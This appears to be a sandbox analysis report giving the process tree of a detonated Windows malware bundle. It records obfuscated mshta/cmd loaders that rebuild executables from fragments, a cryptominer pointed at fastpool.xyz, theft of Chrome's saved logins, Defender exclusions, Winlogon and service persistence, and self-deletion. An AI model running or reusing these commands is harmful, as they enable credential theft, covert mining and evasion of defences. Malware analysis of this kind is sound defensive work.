        "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"
        11⤵
        
        PID:1236
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ).RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )
        10⤵
        
        PID:5604
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i &CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K &Del /Q *
        11⤵
        
        PID:5360
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"
        12⤵
        
        PID:5976
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EChO "
        12⤵
        
        PID:6640
        
        C:\Windows\SysWOW64\control.exe
        
        control ..\WfNRfms4.K
        12⤵
        
        PID:5104
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K
        13⤵
        
        PID:7524
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\WfNRfms4.K
        14⤵
        
        PID:11600
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\WfNRfms4.K
        15⤵
        
        PID:11840
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -Im "7531648.exe"
        9⤵
        Kills process with taskkill
        
        PID:5708
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue2082ea84bd.exe
      4⤵
      PID:1432
    - - C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue2082ea84bd.exe
        
        Tue2082ea84bd.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3068
      - C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue2082ea84bd.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue2082ea84bd.exe
        6⤵
        Executes dropped EXE
        
        PID:2020
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue2095db5b6bd7.exe
      4⤵
      PID:1916
    - - C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue2095db5b6bd7.exe
        
        Tue2095db5b6bd7.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2848
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:5888
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:5304
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue205724605816e79.exe
      4⤵
      PID:2044
    - - C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue205724605816e79.exe
        
        Tue205724605816e79.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        
        PID:1124
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 288 -s 532
      4⤵
      Program crash
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3524
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue20c79bfdadc.exe
      4⤵
      PID:1944

C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue20c79bfdadc.exe
Tue20c79bfdadc.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3004
- C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue20c79bfdadc.exe
  C:\Users\Admin\AppData\Local\Temp\7zS41B73DD5\Tue20c79bfdadc.exe
  2⤵
  - Executes dropped EXE
  PID:1420

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4676
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:4716

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:4920

C:\Windows\SysWOW64\colorcpl.exe
"C:\Windows\SysWOW64\colorcpl.exe"
1⤵
PID:5152
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\Pictures\Adobe Films\tmfiNkDqaI7NL6CF_r5RIK1H.exe"
  2⤵
  PID:5480
- C:\Windows\SysWOW64\cmd.exe
  /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
  2⤵
  PID:11700
- C:\Program Files\Mozilla Firefox\Firefox.exe
  "C:\Program Files\Mozilla Firefox\Firefox.exe"
  2⤵
  PID:10328

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6168
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:5100

C:\Users\Admin\AppData\Roaming\rwjtfiu
C:\Users\Admin\AppData\Roaming\rwjtfiu
1⤵
PID:2188

C:\Users\Admin\AppData\Roaming\bjjtfiu
C:\Users\Admin\AppData\Roaming\bjjtfiu
1⤵
PID:2424
- C:\Users\Admin\AppData\Roaming\bjjtfiu
  C:\Users\Admin\AppData\Roaming\bjjtfiu
  2⤵
  PID:6544

C:\Users\Admin\AppData\Local\Temp\85CD.exe
C:\Users\Admin\AppData\Local\Temp\85CD.exe
1⤵
PID:6456
- C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
  "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
  2⤵
  PID:7328

C:\Users\Admin\AppData\Local\Temp\8716.exe
C:\Users\Admin\AppData\Local\Temp\8716.exe
1⤵
PID:6704
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\glwrlnnt\
  2⤵
  PID:7840
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\odijdloh.exe" C:\Windows\SysWOW64\glwrlnnt\
  2⤵
  PID:8036
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create glwrlnnt binPath= "C:\Windows\SysWOW64\glwrlnnt\odijdloh.exe /d\"C:\Users\Admin\AppData\Local\Temp\8716.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:6088
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description glwrlnnt "wifi internet conection"
  2⤵
  PID:6772
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start glwrlnnt
  2⤵
  PID:7184
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:8020

C:\Users\Admin\AppData\Local\Temp\A2BD.exe
C:\Users\Admin\AppData\Local\Temp\A2BD.exe
1⤵
PID:2976

C:\Users\Admin\AppData\Local\Temp\B04B.exe
C:\Users\Admin\AppData\Local\Temp\B04B.exe
1⤵
PID:2812

C:\Users\Admin\AppData\Local\Temp\CC6F.exe
C:\Users\Admin\AppData\Local\Temp\CC6F.exe
1⤵
PID:7456
- C:\Users\Admin\AppData\Local\Temp\CC6F.exe
  C:\Users\Admin\AppData\Local\Temp\CC6F.exe
  2⤵
  PID:7628

C:\Users\Admin\AppData\Local\Temp\FE9C.exe
C:\Users\Admin\AppData\Local\Temp\FE9C.exe
1⤵
PID:8084
- C:\Users\Admin\AppData\Local\Temp\FE9C.exe
  C:\Users\Admin\AppData\Local\Temp\FE9C.exe
  2⤵
  PID:5260

C:\Users\Admin\AppData\Local\Temp\3AE.exe
C:\Users\Admin\AppData\Local\Temp\3AE.exe
1⤵
PID:8172

C:\Users\Admin\AppData\Local\Temp\1449.exe
C:\Users\Admin\AppData\Local\Temp\1449.exe
1⤵
PID:7352

C:\Windows\SysWOW64\glwrlnnt\odijdloh.exe
C:\Windows\SysWOW64\glwrlnnt\odijdloh.exe /d"C:\Users\Admin\AppData\Local\Temp\8716.exe"
1⤵
PID:7852
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:8044
- - C:\Windows\SysWOW64\svchost.exe
    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
    3⤵
    PID:6372

C:\Users\Admin\AppData\Local\Temp\527C.exe
C:\Users\Admin\AppData\Local\Temp\527C.exe
1⤵
PID:8008

C:\Users\Admin\AppData\Local\Temp\7B23.exe
C:\Users\Admin\AppData\Local\Temp\7B23.exe
1⤵
PID:7764
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.youtube.com
  2⤵
  PID:7600

C:\Users\Admin\AppData\Local\Temp\D4DD.exe
C:\Users\Admin\AppData\Local\Temp\D4DD.exe
1⤵
PID:5996
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ipconfig /release
  2⤵
  PID:6592
- - C:\Windows\SysWOW64\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /release
    3⤵
    - Gathers network information
    PID:12924
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com
  2⤵
  PID:7176
- - C:\Windows\SysWOW64\PING.EXE
    "C:\Windows\system32\PING.EXE" twitter.com
    3⤵
    - Runs ping.exe
    PID:12956
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com
  2⤵
  PID:9548
- - C:\Windows\SysWOW64\PING.EXE
    "C:\Windows\system32\PING.EXE" twitter.com
    3⤵
    - Runs ping.exe
    PID:11448
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com
  2⤵
  PID:10060
- - C:\Windows\SysWOW64\PING.EXE
    "C:\Windows\system32\PING.EXE" twitter.com
    3⤵
    - Runs ping.exe
    PID:7312

C:\Users\Admin\AppData\Local\Temp\FDE2.exe
C:\Users\Admin\AppData\Local\Temp\FDE2.exe
1⤵
PID:6164
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\chromedrlver.exe,"
  2⤵
  PID:11988
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\chromedrlver.exe,"
    3⤵
    PID:6156
- C:\Users\Admin\AppData\Local\chromedrlver.exe
  "C:\Users\Admin\AppData\Local\chromedrlver.exe"
  2⤵
  PID:7420
- - C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
    3⤵
    PID:11864

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:8048
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:5100

C:\Users\Admin\AppData\Local\Temp\236C.exe
C:\Users\Admin\AppData\Local\Temp\236C.exe
1⤵
PID:4936
- C:\Users\Admin\AppData\Local\Temp\ae691d3d-7018-47e5-906c-066bd837d79a\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\ae691d3d-7018-47e5-906c-066bd837d79a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ae691d3d-7018-47e5-906c-066bd837d79a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  2⤵
  PID:12036
- - C:\Users\Admin\AppData\Local\Temp\ae691d3d-7018-47e5-906c-066bd837d79a\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\ae691d3d-7018-47e5-906c-066bd837d79a\AdvancedRun.exe" /SpecialRun 4101d8 12036
    3⤵
    PID:12884
- C:\Users\Admin\AppData\Local\Temp\7170f0bb-babe-4e16-aac7-c35262aa3a03\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\7170f0bb-babe-4e16-aac7-c35262aa3a03\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\7170f0bb-babe-4e16-aac7-c35262aa3a03\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  2⤵
  PID:12056
- - C:\Users\Admin\AppData\Local\Temp\7170f0bb-babe-4e16-aac7-c35262aa3a03\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\7170f0bb-babe-4e16-aac7-c35262aa3a03\AdvancedRun.exe" /SpecialRun 4101d8 12056
    3⤵
    PID:12872
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\236C.exe" -Force
  2⤵
  PID:12700
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\236C.exe" -Force
  2⤵
  PID:12792
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\236C.exe" -Force
  2⤵
  PID:12896
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
  2⤵
  PID:12884
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
  2⤵
  PID:6088
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\236C.exe" -Force
  2⤵
  PID:12784
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe"
  2⤵
  PID:4696
- - C:\Users\Admin\AppData\Local\Temp\911bc168-45fc-4e07-bfb4-1fb305871e91\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\911bc168-45fc-4e07-bfb4-1fb305871e91\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\911bc168-45fc-4e07-bfb4-1fb305871e91\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:9868
  - - C:\Users\Admin\AppData\Local\Temp\911bc168-45fc-4e07-bfb4-1fb305871e91\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\911bc168-45fc-4e07-bfb4-1fb305871e91\AdvancedRun.exe" /SpecialRun 4101d8 9868
      4⤵
      PID:11764
- - C:\Users\Admin\AppData\Local\Temp\92143949-1f37-4490-b344-089449d20627\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\92143949-1f37-4490-b344-089449d20627\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\92143949-1f37-4490-b344-089449d20627\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:9860
  - - C:\Users\Admin\AppData\Local\Temp\92143949-1f37-4490-b344-089449d20627\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\92143949-1f37-4490-b344-089449d20627\AdvancedRun.exe" /SpecialRun 4101d8 9860
      4⤵
      PID:11732
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
    3⤵
    PID:7116
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
    3⤵
    PID:12528
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force
    3⤵
    PID:13008
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
    3⤵
    PID:5056
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force
    3⤵
    PID:2240
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe"
    3⤵
    PID:4768
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"
    3⤵
    PID:5228
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:5264
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force
  2⤵
  PID:8508
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\236C.exe" -Force
  2⤵
  PID:8960
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force
  2⤵
  PID:9284
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
  2⤵
  PID:9404

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5896
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:5104

C:\Users\Admin\AppData\Local\Temp\64AC.exe
C:\Users\Admin\AppData\Local\Temp\64AC.exe
1⤵
PID:8900

C:\Users\Admin\AppData\Local\Temp\BBA7.exe
C:\Users\Admin\AppData\Local\Temp\BBA7.exe
1⤵
PID:12696

C:\Users\Admin\AppData\Local\Temp\2BB7.exe
C:\Users\Admin\AppData\Local\Temp\2BB7.exe
1⤵
PID:352

C:\Users\Admin\AppData\Local\Temp\A676.exe
C:\Users\Admin\AppData\Local\Temp\A676.exe
1⤵
PID:11384

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:12756
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 710CB5FC373C74F04472E9D6EBCE991F C
  2⤵
  PID:9784

C:\Program Files (x86)\Mlpm45r5\mfcud2.exe
"C:\Program Files (x86)\Mlpm45r5\mfcud2.exe"
1⤵
PID:10220

C:\Users\Admin\AppData\Local\Temp\CB40.exe
C:\Users\Admin\AppData\Local\Temp\CB40.exe
1⤵
PID:11316
- C:\Users\Admin\AppData\Local\Temp\CB40.exe
  C:\Users\Admin\AppData\Local\Temp\CB40.exe
  2⤵
  PID:11644
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\e25a5925-b398-4e65-aecf-76f4deabed7c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    3⤵
    - Modifies file permissions
    PID:5388
- - C:\Users\Admin\AppData\Local\Temp\CB40.exe
    "C:\Users\Admin\AppData\Local\Temp\CB40.exe" --Admin IsNotAutoStart IsNotTask
    3⤵
    PID:9620
  - - C:\Users\Admin\AppData\Local\Temp\CB40.exe
      "C:\Users\Admin\AppData\Local\Temp\CB40.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      PID:7584
    - - C:\Users\Admin\AppData\Local\1583d02b-b17f-4e7c-83dc-7b24e7cd4551\build2.exe
        
        "C:\Users\Admin\AppData\Local\1583d02b-b17f-4e7c-83dc-7b24e7cd4551\build2.exe"
        5⤵
        
        PID:11672
      - C:\Users\Admin\AppData\Local\1583d02b-b17f-4e7c-83dc-7b24e7cd4551\build2.exe
        
        "C:\Users\Admin\AppData\Local\1583d02b-b17f-4e7c-83dc-7b24e7cd4551\build2.exe"
        6⤵
        
        PID:4840
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\1583d02b-b17f-4e7c-83dc-7b24e7cd4551\build2.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:11416
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im build2.exe /f
        8⤵
        Kills process with taskkill
        
        PID:9312

\??\c:\windows\system\svchost.exe
c:\windows\system\svchost.exe
1⤵
PID:11924

C:\Users\Admin\AppData\Local\Temp\13D3.exe
C:\Users\Admin\AppData\Local\Temp\13D3.exe
1⤵
PID:496

C:\Users\Admin\AppData\Local\Temp\7E37.exe
C:\Users\Admin\AppData\Local\Temp\7E37.exe
1⤵
PID:11988
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" VbsCRIPt: CloSE (CrEATEOBJECT ("WscriPT.ShEll"). rUn ( "C:\Windows\system32\cmd.exe /r cOPy /y ""C:\Users\Admin\AppData\Local\Temp\7E37.exe"" ..\YGu6dRX.eXE && STart ..\YGU6DRX.exE -pEu3VPItrF6pCIFoPfAdI7 & iF """" == """" for %Q iN ( ""C:\Users\Admin\AppData\Local\Temp\7E37.exe"" ) do taskkill /im ""%~nXQ"" -f ", 0,TRUe ))
  2⤵
  PID:2744
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /r cOPy /y "C:\Users\Admin\AppData\Local\Temp\7E37.exe" ..\YGu6dRX.eXE && STart ..\YGU6DRX.exE -pEu3VPItrF6pCIFoPfAdI7 & iF "" =="" for %Q iN ("C:\Users\Admin\AppData\Local\Temp\7E37.exe" ) do taskkill /im "%~nXQ" -f
    3⤵
    PID:10008
  - - C:\Users\Admin\AppData\Local\Temp\YGu6dRX.eXE
      ..\YGU6DRX.exE -pEu3VPItrF6pCIFoPfAdI7
      4⤵
      PID:8376
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCRIPt: CloSE (CrEATEOBJECT ("WscriPT.ShEll"). rUn ( "C:\Windows\system32\cmd.exe /r cOPy /y ""C:\Users\Admin\AppData\Local\Temp\YGu6dRX.eXE"" ..\YGu6dRX.eXE && STart ..\YGU6DRX.exE -pEu3VPItrF6pCIFoPfAdI7 & iF ""-pEu3VPItrF6pCIFoPfAdI7 "" == """" for %Q iN ( ""C:\Users\Admin\AppData\Local\Temp\YGu6dRX.eXE"" ) do taskkill /im ""%~nXQ"" -f ", 0,TRUe ))
        5⤵
        
        PID:11536
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /r cOPy /y "C:\Users\Admin\AppData\Local\Temp\YGu6dRX.eXE" ..\YGu6dRX.eXE && STart ..\YGU6DRX.exE -pEu3VPItrF6pCIFoPfAdI7 & iF "-pEu3VPItrF6pCIFoPfAdI7 " =="" for %Q iN ("C:\Users\Admin\AppData\Local\Temp\YGu6dRX.eXE" ) do taskkill /im "%~nXQ" -f
        6⤵
        
        PID:12968
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCrIPt:ClosE ( CReatEoBJect ( "wSCRiPt.sHELl"). rUN( "CMd.EXE /q /R Echo | SET /p = ""MZ"" >G52~.M & cOpY /y /B g52~.M + MyDCSYS.aJ2 + SoLi.X + NlEYUAM.J + VrTf6S.Kuq+ JAWQ.UF + 5CkHYa.YmN ..\FJ~iiI.s & DEL /q *& sTart control ..\FJ~iII.s " , 0,tRue ))
        5⤵
        
        PID:12568
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /R Echo | SET /p = "MZ" >G52~.M & cOpY /y /B g52~.M + MyDCSYS.aJ2+SoLi.X + NlEYUAM.J + VrTf6S.Kuq+JAWQ.UF+5CkHYa.YmN ..\FJ~iiI.s &DEL /q *& sTart control ..\FJ~iII.s
        6⤵
        
        PID:9016
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Echo "
        7⤵
        
        PID:4308
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>G52~.M"
        7⤵
        
        PID:11352
        
        C:\Windows\SysWOW64\control.exe
        
        control ..\FJ~iII.s
        7⤵
        
        PID:4128
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\FJ~iII.s
        8⤵
        
        PID:12876
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\FJ~iII.s
        9⤵
        
        PID:8728
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\FJ~iII.s
        10⤵
        
        PID:2840
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "7E37.exe" -f
      4⤵
      Kills process with taskkill
      PID:5000

C:\Users\Admin\AppData\Local\Temp\B601.exe
C:\Users\Admin\AppData\Local\Temp\B601.exe
1⤵
PID:8884
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im B601.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\B601.exe" & del C:\ProgramData\*.dll & exit
  2⤵
  PID:11712
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im B601.exe /f
